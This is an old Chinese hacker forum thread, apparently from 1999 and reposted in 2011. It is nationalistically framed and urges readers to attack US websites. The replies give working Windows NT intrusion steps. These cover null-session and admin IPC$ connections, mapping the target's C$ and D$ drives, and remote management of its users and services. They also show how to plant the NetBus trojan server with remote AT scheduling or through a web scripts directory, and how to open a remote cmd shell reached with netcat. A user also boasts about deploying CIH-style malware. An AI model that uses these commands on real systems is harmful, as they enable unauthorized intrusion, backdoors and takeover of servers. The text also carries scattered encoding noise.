《版主頁黑客工具和文章的幾個問題》中提到:6 ^$ x; f% B) \' A+ T8 s; G% y
請教�����,從版主頁上載得PINGER�����,GRINDER�����,LETMEIN等��,卻不能用����,PINGER安裝后��,明明安裝前文件有1M多,但安裝完后生成的文件夾中只有PINGER�。EXE,40多K���,運行PINGER��,設(shè)置好IP�,點PING���,彈出一個窗口(C++。�。。)��,說出錯���,然后關(guān)閉了����,何故���,是不是安裝有誤��? 2�。運行LETMEIN,彈出以下錯誤:連接文件LETMEIN����。EXE到不存在的NETAPI32。DLL�;NETGROUPGETUSERS。 是否說明需要NETAPI32���。DLL文件����,哪里有該DLL���。 3���。USAKILLER 的教學(xué)文章中提到需在WINNT4。0下運行以下步驟等�����,是否要求我的操作系統(tǒng)也是WINNT4�����。0 ,應(yīng)該不是吧��? 4���。NC FOR NT 是否要求我的操作系統(tǒng)為NT�,還是服務(wù)器的操作系統(tǒng)為NT����? 太多的問題需高手回答,我花那么多的時間和金錢下載這幾M文件卻不能用�����,實在窩囊哦���, 強(qiáng)烈建議USAKILLER 等高手級的黑客寫更多的教學(xué)文章,以提高我國黑客水平���。8 `: y/ Z: W- U2 n1 l/ R* r: j4 A
> 我的機(jī)子MMX166�,WIN98��,2。5G�,32M內(nèi)存。
+ ~ D+ N0 F! |7 X6 a4 b
" S0 j4 z& D# y2 K$ f* v" r8 h( _黑客并不神秘����,你只要了解操作系統(tǒng),學(xué)習(xí)一些操作系統(tǒng)的弱點���,輔助相關(guān)的工具���,就可以成功。4 N; k, p" Z/ B+ j2 r; } V1 p
你的問題是��,pinger, grinder, letmein等工具必須要在NT上運行����,我們強(qiáng)烈建議,你一定要安裝NT�,對于你的機(jī)器配制,和我們現(xiàn)在差不多�,只是比你多了32M內(nèi)存,2G硬盤�����。
- |) S/ M* Y9 T" r' G其實,攻擊敵站���,利用其操作系統(tǒng)本身的工具就可以了�,比如�,我們在NT上攻擊某服務(wù)器,該服務(wù)器為NT4.0�,我們將做如下簡單事情就有可能成功,假設(shè)目標(biāo)NT的IP地址為111.111.111.111��,做法如下:
T- J9 i4 |8 a2 I9 Unet use \\111.111.111.111\ipc$ "" /user:""
& }; ?& v" w5 |- E; j7 }net.exe是NT的工具文件�����,該命令將和目標(biāo)服務(wù)器建立Null Session���,如果成功�,你可以查看該服務(wù)器上的共享目錄:6 [1 j0 x% R9 \- Y8 ?
net view \\111.111.111.111
+ Z% E: y1 [+ c; ]) E當(dāng)然��,如果你有該NT管理員密碼�,就更好辦了�����,假設(shè)其管理員Admin密碼為fuck:
- s2 b# a; G9 S8 [net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"( C# Z* S0 U2 n' v0 b
命令成功后,幾乎所有目標(biāo)NT上的配制���,資源��,你都可以在你本地NT上連接遠(yuǎn)程計算機(jī)來查看或修改:
2 `3 i. g, J( o: f1����、查看或修改遠(yuǎn)程機(jī)器上的硬盤�����,假如目標(biāo)NT上有C��、D兩個硬盤:
( V8 C- f5 o+ Knet use x: \\111.111.111.111\c$
. v) Q+ H8 g9 ^) dnet use y: \\111.111.111.111\d$2 I) L9 f3 [2 x( c& i" a2 s& [
這樣���,目標(biāo)NT上的C�����、D盤分別被影射為你本地的X���、Y盤,你想怎么做都可以...
3 y4 G* h% {" a( e2��、管理目標(biāo)NT的用戶:6 D+ V+ |' Z2 E% t+ g
從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”' X4 O( O$ ]6 |9 C2 D" e: g! M
鍵入\\111.111.111.111后,目標(biāo)NT上的所有用戶你想怎么做都可以���,和管理你本地的一樣7 B+ \, r8 j) b$ u& O
3���、管理目標(biāo)NT的服務(wù)5 _0 N8 T( |# A: L" x
選擇“管理工具(公用)”->“服務(wù)器管理”->“計算機(jī)”->“選擇域”
' h8 M( w8 ^+ w- \! h這樣你可以管理目標(biāo)NT上的服務(wù),共享目錄
x4 @% I+ B$ V4��、IIS管理
A4 [8 b& O3 \ b- ^* ]4 ]7 s; E選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.1112 A6 P3 d+ F! u, t' E
目標(biāo)NT的FTP��、WWW服務(wù)你就可以重新配置
' F% W$ ~0 @& x, O7 m2 g+ g* z5��、事件管理
8 H# @! e5 @4 [1 D/ @' u“事件查看器”->連接到服務(wù)器->111.111.111.111
: s; Z6 r1 B' m5 v, p. D
, n6 M! Y; d; E1 e! Y2 I/ T還有更多的東西��,都可以用NT本身的功能來完成����,這些都是95, 98所不能實現(xiàn)的。
: S3 _" f$ N) M9 {+ f7 T7 N
" S7 [7 A' O, E" G$ f& _當(dāng)然��,98,95也能做一些事情���,但很麻煩,比如:
2 f5 n) z$ I4 T, _3 Snet use \\111.111.111.111\ipc$
4 _1 m1 J4 i' ~- V5 xnet use z: \\111.111.111.111\d$, `7 x, b! Y. Z+ |# l
但其后不能帶參數(shù)�,即改用其他用戶或密碼����,系統(tǒng)將用當(dāng)前用戶和密碼去登錄��,如果你知道目標(biāo)NT的用戶或密碼��,重新啟動95, 98����,改用該用戶和密碼登錄,方可實現(xiàn)�����,你可以連接目標(biāo)NT上的共享資源��,但不能進(jìn)行管理�,如用戶、事件等
8 u( u; _; M! w4 N% p9 V9 x: O% d0 x& W: m9 k* ~
我們強(qiáng)烈建議各位有心要為死難者報仇�����,真正的想黑霉國的站點�,花點時間,裝個NT吧,NT Workstation也可以�!( U$ k I# ~. q) D9 u
這樣,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用����!
' d% H9 X& t) m2 U$ o% E! w
* l- k) W( @! h* `) B+ k; n$ y* o- I S8 O
--------------------------------------------------------------------------------& l# x+ d: ^2 M$ M$ h" f
4 o3 l9 l* O: n/ ~9 M>quack于1999-06-12,23:37:44' Y3 \6 C% C7 Z3 c
在大作《幾個有關(guān)黑的問題》中提到:
; a Z, ]9 r1 R. e- u* f首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時亦無此參數(shù)項,不知為是何原因?另,用PINGER查詢到的IP地址若無機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時無效,假定上傳其它"有益"美國NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國機(jī)子,但運行程序時卻是在我的機(jī)上干活,差點把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個美國人,哈!���。9 o" J- [; O/ A8 }
- I7 S8 _1 r2 C
killusa于1999-06-13�����,03:25:15- x) E/ H6 \4 J" p. c4 D% h- K8 |
在大作《Re: 幾個有關(guān)黑的問題》中提到:
) P( g4 e- h6 ?8 s! @- G. \+ X
f/ ?2 Z+ |2 U+ P2 Rletmein.exe 暫時沒有mypwd參數(shù)����,十分抱歉9 M" C u' g1 R
pinger程序����,只是利用ping來尋找主機(jī),每臺NT服務(wù)器有一個主IP地址�,但也可以設(shè)置多個輔助IP地址,比如有些服務(wù)器供應(yīng)商�,一臺NT服務(wù)器上可以設(shè)置一千多個IP,每個IP對應(yīng)一個Hostname,而真正能找到主機(jī)名的只有一個IP地址���,就是該主機(jī)的主IP地址���,所以有時顯示只有IP,而無主機(jī)名�����。另外�,有些服務(wù)器是非NT的操作系統(tǒng),有時將不會顯示主機(jī)名�����。當(dāng)然�����,有時在服務(wù)器上進(jìn)行一些設(shè)置����,也會出現(xiàn)上面的情況。
4 m; a; g/ l$ L$ L5 T9 i
& S; z3 \3 R0 p# h4 f+ uNetbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個程序����,所以,netbus.exe是不用上傳的,只需在目的
) R# @2 ?' S9 d! I# y: x; l: ?服務(wù)器上運行ntsrv.exe����,而在目的服務(wù)器運行該程序有很多種方法:" }- y/ A( I( l* b {. z J- b
6 F* U7 A9 J5 H- ^- |
1、利用服務(wù)器的 Schedule 服務(wù)來啟動schedule 服務(wù)是指在服務(wù)器上定時運行某程序���,具體使用方法�����,可在自己的NT Dos窗口下鍵入以下:
. [7 X: x- Y4 d' S$ Y" a: g* |5 X- W; ~4 n0 e4 k7 P# u
C:\>net start schedule. {5 w* o6 x4 R i- p
Schedule 正在啟動服務(wù).....* ^7 I! S( N8 Y, L. K4 o
Schedulw 服務(wù)啟動成功�。
9 C) \2 a- l; t8 h1 Q& vC:\>at /?
6 h1 A* a& Q6 |4 ?1 uAT 命令排定在特定的日期和時間運行某些命令和程序�����。
# W: R; o2 M& ~ f) C& C' J2 B f0 {運行 AT 命令之前必須先啟動 Schedule 服務(wù)�����。6 x: O) X( T w
9 }8 }, P1 F3 I5 l4 {4 | O% ^% W! b# w
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
2 p9 f0 f. h6 H6 R; GAT [\\computername] time [/INTERACTIVE]
5 b8 ]/ K. a( V5 D& J3 A7 s[ /EVERY:date[,...] | /NEXT:date[,...]] "command"0 V" g6 G$ }2 U, _& e3 `" U: N2 ^
+ |8 Z" e G l& k
\\computername 指定遠(yuǎn)程計算機(jī)�����。 如果省略這個參數(shù)
+ i, E4 Q( s7 O( @命令會被排定在本機(jī)上運行���。
" n# F% E5 q* u& Y* }) oid 指定給排定進(jìn)度命令的識別號�����。4 L0 J& S- f2 \# M2 a5 a2 t
) @2 R! g6 c2 W( U) M
/delete 刪除某個已排定進(jìn)度的命令��。如果省略標(biāo)識��,計算機(jī)上所有已排定進(jìn)度的命令都會被刪除���。
! r3 E. K. d) Y/yes 用于刪除所有作業(yè),且不想在運行刪除時顯示確認(rèn)信息 �����。
! j, S8 \% U3 ~# utime 指定命令運行的時間�����。
# v+ K, Q/ t; `" u/interactive 允許作業(yè)在運行時��,與用戶通過桌面交互��。. E, y& A) f. R1 n& d j
3 M. [+ M4 H2 a! l" m$ W: h/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運行命令��。
& [2 _, w v+ M. m: ?) D5 y如果省略日期,則默認(rèn)為在每月的本日運行��。
0 M; G7 Z/ B- D
* Y3 Y" q3 ]5 b+ l3 {/next:date[,...] 指定在下一個指定日期 (如���,下周三)�,運行命令�����。如果省略日期����,則默認(rèn)為在每月的本日運行。
9 g( x; v: Q* P- Q6 P1 v! e$ s- u6 d
"command" 準(zhǔn)備運行的 Windows NT 命令或批處理文件�。
' n& U/ P. A* l. W+ M9 V% Q) F
5 K, a- b' s3 g3 j) P; S; r* R; k: hC:\>
6 Q6 E% I3 `' [! i- M* {
* D# r, Y& V$ W. J( y0 E" | a# G4 p知道了如何使用AT,再來看看如何在遠(yuǎn)程NT上運行ntsrv.exe:
: t" Z/ f$ d: `. U* S# m& s1 利用管理員登陸到目的服務(wù)器���,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"0 e h4 \& Z- L
2 利用ntsrv.exe啟動遠(yuǎn)程: netsvc \\x.x.x.x schedule /start
& v3 Q0 M+ s: |: _& m9 T) G- U$ v3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時運行���,當(dāng)然最快運行最理想,所以��,你可以用letmein.exe得到服務(wù)器的時間����,然后:4 m8 I, f. l; A5 f& }
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
' g! m! [5 [* |& X7 a其中00:00要改為用letmein.exe得回來的具體時間+一點容量�,等一會后���,再在本地啟動netbus.exe��,鍵入目的服務(wù)器得ip地址或hostname���,連接���!具體使用可參照 "How to get in nt"����,比如第一種方法����,你想要在目的服務(wù)器運行 LEGION,可以利用netbus得上傳功能��,將LEGION上傳至目的服務(wù)器����,再用netbus的"Start program"���,鍵入完整路徑的LEGION運行程序,就ok了�!第二種方法是利用netbus的“App redirect”功能,啟動遠(yuǎn)程telnet服務(wù)�,如下:在netbus中擊“App redirect”,鍵入"C:\>winnt\system32\cmd.exe"�,Port為:4321,服務(wù)就啟動了����,然后在本地運行:nc x.x.x.x 4321,出現(xiàn)dos啟動的畫面就表示連接成功:
! ]" A8 w5 E1 ?7 j. ]Microsoft(R) Windows NT(TM)
; B* q9 p7 x( V$ _; h; ?5 E1 Y0 P(C) Copyright 1985-1996 Microsoft Corp.6 e0 Q" }7 t5 H! t
C:\>* q3 ^2 h- w2 q* m' Z
6 q3 ], w% B" c, e/ V# C2����、利用web啟動ntsrv.exe或其他程序在目的服務(wù)器5 j: X9 {2 r0 {8 ]4 }) f, g( {$ Q
& o; f: {8 b/ v* E2 \4 J- b* v將ntsrv.exe 或其他運行程序Copy到目的服務(wù)器的www可執(zhí)行目錄,如cgi-bin或scripts�����,然后在瀏覽器鍵入url如:* O# h1 G2 U/ X8 b# z/ y5 \: g
http://x.x.x.x/scripts/ntsrv.exe /port:643212 @/ G& B* F2 @* o4 J/ q
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:643218 L( C* w3 _0 f* C! S t
該程序就啟動了
w7 s1 a) i: T# T# C/ w" V( o4 T# N8 B! S% W
我只提這幾中方法���!
( j/ } a! T' {+ P要成功�,必須打好基礎(chǔ)工����,對操作系統(tǒng)充分了解!
4 ?( b( T4 O: E* N0 J W- F
9 O$ H( Y6 Z& y! ]5 K |
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡